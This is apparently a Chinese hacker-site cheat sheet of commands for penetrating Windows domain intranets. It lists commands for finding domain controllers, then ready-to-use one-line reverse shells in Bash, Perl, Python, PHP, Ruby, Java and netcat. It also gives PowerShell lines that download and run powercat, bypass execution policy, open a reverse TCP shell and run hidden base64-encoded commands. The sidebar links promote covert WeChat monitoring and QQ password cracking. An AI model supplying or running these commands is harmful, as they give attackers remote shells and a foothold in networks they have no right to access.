找黑客平台

内网域实战渗透常用命令

访客4年前黑客工具483

  一、查找域控的几个常用 ***

  1.net view

  net view /domain

  2.set log

  set log

  3.通过srv记录

  nslookup -type=SRV _ldap._tcp.corp

  4.使用nltest

  nltest /dclist:corp

  5.使用dsquery

  DsQuery Server -domain corp

  6.使用netdom

  netdom query pdc

  注释:这些都是win系统自带的命令,有的时候win版本不同,有的命令会不存在,所以多一种 *** ,多一种成功的可能性,实际渗透,自行根据目标环境变换。

  二、各种语言一句话反弹shell

  Bash [不通用,跟linux发行版本有关,在ubuntu上测试成功]

  bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

  PERL

  perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

  Python

  python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

  PHP

  php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i &3 2>&3");'

  Ruby

  ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i &%d 2>&%d",f,f,f)'

  Java

  r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5/dev/tcp/10.0.0.1/2002;cat &5 >&5; done"] as String[]) p.waitFor()

  netcat

  nc -e /bin/sh x.x.x.x 2333

  但某些版本的nc没有-e参数(非传统版),则可使用以下方式解决

  rm/tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc x.x.x.x 2333 >/tmp/f

  三、常用Powershell命令

  1.通过远程下载来执行

  Set-ExecutionPolicy RemoteSigned IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

  2.把ps脚本传到本地后执行

  PowerShell.exe -ep Bypass -File d:powercat.ps1

  3.本地交互式执行

  E:>PowerShell.exe -ExecutionPolicy Bypass Invoke-PowerShellTcp -Reverse -IPAddress 10.18.180.18 -Port 4444

  4.把ps脚本编码成base64来执行[实战用的最多]

  powershell -ep bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -enc base64加密过的命令

标签: 内网域实战渗透常用命令
返回列表

上一篇:内网漫游之SOCKS代理大结局

下一篇:SEO实战培训怎么样?实战型SEO培训好不好?

相关文章

微信为什么不做群聊助手?

今天看到“设计的威严”公众号介绍微信为什么不做群聊助手,作者的分析如下: 随着用户使用微信越来越多。微信群也越来越多,好多群的信息对用户并不重要,消息对话框被各种群消息占领。 微信没有做微信群聊助手...

黑客变声(变声黑科技)

黑客变声(变声黑科技)

本文导读目录: 1、变声精灵中选着要导入的音频怎么回事 2、《名侦探柯南》最全能的五位角色都是谁? 3、汤姆猫遭黑客进攻片段怎么样的? 4、万能变声器怎么破解 5、找一款可以在QQ上男...

支付宝是什么时候出来的(支付宝怎么开通)

支付宝是什么时候出来的(支付宝怎么开通)

在今天的节目里面啊我们来聊一聊支付宝号是什么? 支付宝呢是国内非常优秀的一个第三方支付平台,致力于提供简单安全快速的支付解决方案,支付宝是2004年成立的,主要提供有支付和理财的服务,包括网络担保交...

小发现:可查随便联通号码流量使用情况

谢谢本站网友“howplay”分享,更多有趣内容请接见本站论坛。 提取自联通APP的地址,只需要在后面输入联通手机号码,就可以查看手机流量。 http://124.160.194.12:808...

怎么监控别人微信不被发现 远程调取微信聊天记录

每日要闻你好,我很抱歉,首先,不要说在电脑方面访问别人的微信内容,是自己无法获取的,因为目前微信电脑和手机内容是不同步的。 如何远程阅读他人的微信信息 怎么监控别人的微信不被发现(远程调取微信聊天...

怎么找顶级黑客-黑客语言翻译(黑客需要掌握什么技术和语言)

怎么找顶级黑客-黑客语言翻译(黑客需要掌握什么技术和语言)

怎么找顶级黑客相关问题 黑客领域相关问题 黑客源码怎么上传空间 免费破qq密码的软件(qq盗号软件破密码2018)...

Copyright Your WebSite.Some Rights Reserved.

免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!

Hacker by Hacker.